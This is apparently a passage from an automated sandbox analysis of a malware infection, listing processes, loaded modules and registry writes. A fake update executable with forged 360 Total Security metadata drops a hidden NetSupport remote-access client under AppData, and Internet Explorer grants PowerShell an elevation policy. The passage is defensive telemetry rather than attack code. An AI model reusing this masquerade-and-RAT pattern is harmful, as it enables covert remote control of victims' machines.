c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3692
CMD
"C:\Temp\KB24115436.exe"
Path
C:\Temp\KB24115436.exe
Indicators
Parent process
temp69.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Qihoo 360 Technology Co. Ltd.
Description
360 Total Security
Version
10,0,0,1160
Modules
Image
c:\temp\kb24115436.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\riched20.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport.exe
c:\windows\system32\sfc.dll
c:\windows\system32\devrtl.dll
c:\windows\system32\mpr.dll

PID
4028
CMD
"C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport.exe" -pjf74idD
Path
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport.exe
Indicators
Parent process
KB24115436.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\roaming\codeintegrity\winsupport.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\riched20.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\client32.exe
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\sfc.dll
c:\windows\system32\devrtl.dll
c:\windows\system32\mpr.dll
c:\windows\system32\netutils.dll

PID
2268
CMD
"C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\client32.exe"
Path
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\client32.exe
Indicators
Parent process
WinSupport.exe
User
admin
Integrity Level
MEDIUM
Exit code
9
Version:
Company
NetSupport Ltd
Description
NetSupport Client Application
Version
V12.10
Modules
Image
c:\users\admin\appdata\roaming\codeintegrity\winsupport\client32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\pcicl32.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\shfolder.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\pcichek.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\msvcr100.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\pcicapi.dll
c:\windows\system32\mpr.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\version.dll
c:\windows\system32\winmm.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wtsapi32.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\cryptpak.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\tcctl32.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\htctl32.dll
c:\windows\system32\psapi.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\pcihooks.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\winsta.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\riched32.dll
c:\windows\system32\riched20.dll
c:\users\admin\appdata\roaming\codeintegrity\winsupport\pciinv.dll
c:\windows\system32\msimg32.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\dwmapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\firewallapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\msi.dll
c:\program files\adobe\acrobat reader dc\reader\acrord32.exe
c:\program files\ccleaner\ccleaner.exe
c:\program files\google\chrome\application\chrome.exe
c:\program files\dvd maker\dvdmaker.exe
c:\windows\system32\propsys.dll
c:\windows\system32\linkinfo.dll
c:\program files\microsoft office\office14\excel.exe
c:\program files\filezilla ftp client\filezilla.exe
c:\program files\mozilla firefox\firefox.exe
c:\program files\internet explorer\iexplore.exe
c:\program files\java\jre1.8.0_92\bin\javaws.exe
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\program files\windows journal\journal.exe
c:\program files\common files\microsoft shared\ink\mip.exe
c:\program files\windows media player\wmplayer.exe
c:\program files\microsoft office\office14\msaccess.exe
c:\program files\common files\microsoft shared\office14\msoxmled.exe
c:\program files\opera\opera.exe
c:\program files\microsoft office\office14\mspub.exe
c:\program files\microsoft office\office14\outlook.exe
c:\program files\notepad++\notepad++.exe
c:\program files\microsoft office\office14\ois.exe
c:\windows\system32\ie4uinit.exe
c:\program files\microsoft office\office14\onenote.exe
c:\program files\microsoft\skype for desktop\skype.exe
c:\program files\microsoft office\office14\powerpnt.exe
c:\program files\videolan\vlc\vlc.exe
c:\program files\windows sidebar\sidebar.exe
c:\program files\common files\microsoft shared\ink\tabtip.exe
c:\program files\windows mail\wab.exe
c:\program files\windows mail\wabmig.exe
c:\program files\winrar\winrar.exe
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\program files\common files\microsoft shared\ink\shapecollector.exe
c:\program files\filezilla ftp client\uninstall.exe
c:\windows\system32\gameux.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\wer.dll
c:\program files\java\jre1.8.0_92\bin\javacpl.exe
c:\program files\common files\microsoft shared\office14\office setup controller\promo.exe
c:\windows\system32\tapi32.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\dxdiagn.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\d3d10.dll
c:\windows\system32\d3d10core.dll
c:\windows\system32\d3d10_1.dll
c:\windows\system32\d3d10_1core.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\ddraw.dll
c:\windows\system32\dsound.dll

Registry activity

Total events
3916
Read events
3681
Write events
232
Delete events
3

Modification events

PID
Process
Operation
Key
Name
Value
3076
iexplore.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019032320190324
3076
iexplore.exe
delete key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000077000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{163C6779-A3E6-11E9-B506-5254004A04AF}
0
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Type
4
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Count
1
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Time
E307070004000B000E000D002B001602
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
Type
4
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
Count
1
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
Time
E307070004000B000E000D002B002502
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Window_Placement
2C0000000200000003000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF20000000200000004003000078020000
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links
Order
08000000020000000C01000001000000020000007E0000000000000070003200EC000000464B245120005355474745537E312E55524C0000540008000400EFBE454B974D464B24512A000000F94300000000020000000000000000000000000000005300750067006700650073007400650064002000530069007400650073002E00750072006C0000001C00000000000000820000000100000074003200E2000000464B24512000574542534C497E312E55524C0000580008000400EFBE454B864A464B24512A000000743E0000000003000000000000000000000000000000570065006200200053006C006900630065002000470061006C006C006500720079002E00750072006C0000001C00000000000000
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
Type
3
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
Count
1
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
Time
E307070004000B000E000D002B00F102
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
LoadTime
24
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
1
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E307070004000B000E000D002B002F03
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
LoadTime
400
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
Type
3
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
Count
1
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
Time
E307070004000B000E000D002C00AE00
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
LoadTime
57
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019071120190712
CachePath
%USERPROFILE%\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019071120190712
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019071120190712
CachePrefix
:2019071120190712:
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019071120190712
CacheLimit
8192
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019071120190712
CacheOptions
11
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019071120190712
CacheRepair
0
3076
iexplore.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
LanguageList
en-US
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
9C08C1D9F237D501
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
F66AC3D9F237D501
3076
iexplore.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Blob
040000000100000010000000410352DC0FF7501B16F0028EBA6F45C50F00000001000000140000005BCAA1C2780F0BCB5A90770451D96F38963F012D090000000100000042000000304006082B0601050507030406082B0601050507030106082B0601050507030206082B06010505070308060A2B0601040182370A0304060A2B0601040182370A030C6200000001000000200000000687260331A72403D909F105E69BCF0D32E1BD2493FFC6D9206D11BCD67707390B000000010000001E000000440053005400200052006F006F0074002000430041002000580033000000140000000100000014000000C4A7B1A47B2C71FADBE14B9075FFC415608589101D00000001000000100000004558D512EECB27464920897DE7B66053030000000100000014000000DAC9024F54D8F6DF94935FB1732638CA6AD77C131900000001000000100000006CF252FEC3E8F20996DE5D4DD9AEF42420000000010000004E0300003082034A30820232A003020102021044AFB080D6A327BA893039862EF8406B300D06092A864886F70D0101050500303F31243022060355040A131B4469676974616C205369676E617475726520547275737420436F2E311730150603550403130E44535420526F6F74204341205833301E170D3030303933303231313231395A170D3231303933303134303131355A303F31243022060355040A131B4469676974616C205369676E617475726520547275737420436F2E311730150603550403130E44535420526F6F7420434120583330820122300D06092A864886F70D01010105000382010F003082010A0282010100DFAFE99750088357B4CC6265F69082ECC7D32C6B30CA5BECD9C37DC740C118148BE0E83376492AE33F214993AC4E0EAF3E48CB65EEFCD3210F65D22AD9328F8CE5F777B0127BB595C089A3A9BAED732E7A0C063283A27E8A1430CD11A0E12A38B9790A31FD50BD8065DFB7516383C8E28861EA4B6181EC526BB9A2E24B1A289F48A39E0CDA098E3E172E1EDD20DF5BC62A8AAB2EBD70ADC50B1A25907472C57B6AAB34D63089FFE568137B540BC8D6AEEC5A9C921E3D64B38CC6DFBFC94170EC1672D526EC38553943D0FCFD185C40F197EBD59A9B8D1DBADA25B9C6D8DFC115023AABDA6EF13E2EF55C089C3CD68369E4109B192AB62957E3E53D9B9FF0025D0203010001A3423040300F0603551D130101FF040530030101FF300E0603551D0F0101FF040403020106301D0603551D0E04160414C4A7B1A47B2C71FADBE14B9075FFC41560858910300D06092A864886F70D01010505000382010100A31A2C9B17005CA91EEE2866373ABF83C73F4BC309A095205DE3D95944D23E0D3EBD8A4BA0741FCE10829C741A1D7E981ADDCB134BB32044E491E9CCFC7DA5DB6AE5FEE6FDE04EDDB7003AB57049AFF2E5EB02F1D1028B19CB943A5E48C4181E58195F1E025AF00CF1B1ADA9DC59868B6EE991F586CAFAB96633AA595BCEE2A7167347CB2BCC99B03748CFE3564BF5CF0F0C723287C6F044BB53726D43F526489A5267B758ABFE67767178DB0DA256141339243185A2A8025A3047E1DD5007BC02099000EB6463609B16BC88C912E6D27D918BF93D328D65B4E97CB15776EAC5B62839BF15651CC8F677966A0A8D770BD8910B048E07DB29B60AEE9D82353510
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9F6EE0FA-4991-4DD7-87B9-9DA4AD1C1781}
AppPath
C:\Windows\System32\WindowsPowerShell\v1.0
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9F6EE0FA-4991-4DD7-87B9-9DA4AD1C1781}
AppName
powershell.exe
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9F6EE0FA-4991-4DD7-87B9-9DA4AD1C1781}
Policy
3
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
Path
C:\Users\admin\Favorites\Links\Suggested Sites.url
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
Handler
{B0FA7D7C-7195-4F03-B03E-9DC1C9EBC394}
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
FeedUrl
https://ieonline.microsoft.com/#ieslice
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
DisplayName
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
ErrorState
0
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
DisplayMask
0
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
Path
C:\Users\admin\Favorites\Links\Web Slice Gallery.url
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
Handler
{B0FA7D7C-7195-4F03-B03E-9DC1C9EBC394}
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
FeedUrl
http://go.microsoft.com/fwlink/?LinkId=121315
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
DisplayName
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
ErrorState
0
3076
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
DisplayMask
0
3556
iexplore.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Extensible Cache\MSHist012018082820180829
3556
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Extensible Cache\MSHist012019071120190712
CachePath
%USERPROFILE%\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012019071120190712
3556
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Extensible Cache\MSHist012019071120190712
CachePrefix
:2019071120190712:
3556
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Extensible Cache\MSHist012019071120190712
CacheLimit
8192
3556
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Extensible Cache\MSHist012019071120190712
CacheOptions
11
3556
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Extensible Cache\MSHist012019071120190712
CacheRepair
0
3872
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
LanguageList
en-US
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
3872
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
3872
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3872
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2432
WScript.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
LanguageList
en-US
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
EnableFileTracing
0
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
EnableConsoleTracing
0
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
FileTracingMask
4294901760
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
ConsoleTracingMask
4294901760
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
MaxFileSize
1048576
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
FileDirectory
%windir%\tracing
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS
EnableFileTracing
0
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS
EnableConsoleTracing
0
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS
FileTracingMask
4294901760
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS
ConsoleTracingMask
4294901760
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS
MaxFileSize
1048576
2432
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASMANCS
FileDirectory
%windir%\tracing
2432
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2432
WScript.exe
write
